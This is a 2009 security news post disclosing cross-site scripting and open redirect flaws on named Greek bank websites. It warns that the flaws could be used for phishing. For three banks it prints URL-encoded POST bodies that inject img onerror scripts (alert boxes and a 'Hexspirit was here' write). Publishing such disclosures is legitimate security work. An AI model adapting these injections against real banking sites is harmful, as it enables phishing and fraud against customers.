Major Greek bank sites with SSL vulnerable to XSS and open redirects
Written by DP
Sunday, 10 May 2009
Security researcher "Hexspirit" has discovered multiple XSS and open redirect vulnerabilities affecting all major Greek bank websites.
Fraudsters can exploit these cross-site scripting flaws to conduct convincing phishing attacks against e-banking customers and site visitors. Most pages are served over SSL. Security cannot be guaranteed just by the presence of "https" at the start of a URL, or checking that the browser address bar contains the correct domain name.
All the reported vulnerabilities are working at this time of writing and we hope to be fixed as soon as possible.
Greek Banks XSS Mirrors:
winbank.gr XSS Mirror (SSL)
POST: PBAccount=&HiddenPirAccount=&HiddenPrintMode=0&OtherAccount=%3Cimg+src%3Dk+onerror%3Dalert%28%2FXSS% 2F%29+%2F%3E&submit2=%C5%F0%E9%E2%E5%E2%E1%DF%F9%F3%E7
milleniumbank.gr XSS Mirror (no SSL)
POST: txtAccountNo=&_ctl0%3AtxtIBANCheck=%3Cimg+src%3Dk+onerror%3Dalert%28%2FXSS%2F%29+%2F% 3E&_ctl0%3AbtnCheckIBAN=%CE%88%CE%BB%CE%B5%CE%B3%CF%87%CE%BF%CF%82
probank.gr XSS Mirror (SSL)
proton.gr XSS Mirror (SSL)
protonbank.gr XSS Mirror (SSL)
eurobank.gr XSS Mirror (SSL)
POST: branch=3243&cd=43&main=%22%3Cimg+src%3D%22%22+onerror%3D%22write%28%27%3Cbody%3E%3Cb%3EHexspirit+was +here.+XSS+flaw.%3C%2Fb%3E%27%29%3Bclose%28%29%3Balert%28body.innerHTML%29%22+%2F%3E&account=&ibansp ace=&source=
nbg.gr Open redirect Mirror (SSL)
alpha.gr XSS Mirror (SSL)
bankofcyprus.gr Open redirect Mirror (no SSL)
ttbank.gr XSS Mirror
dias.com.gr XSS Mirror (no SSL)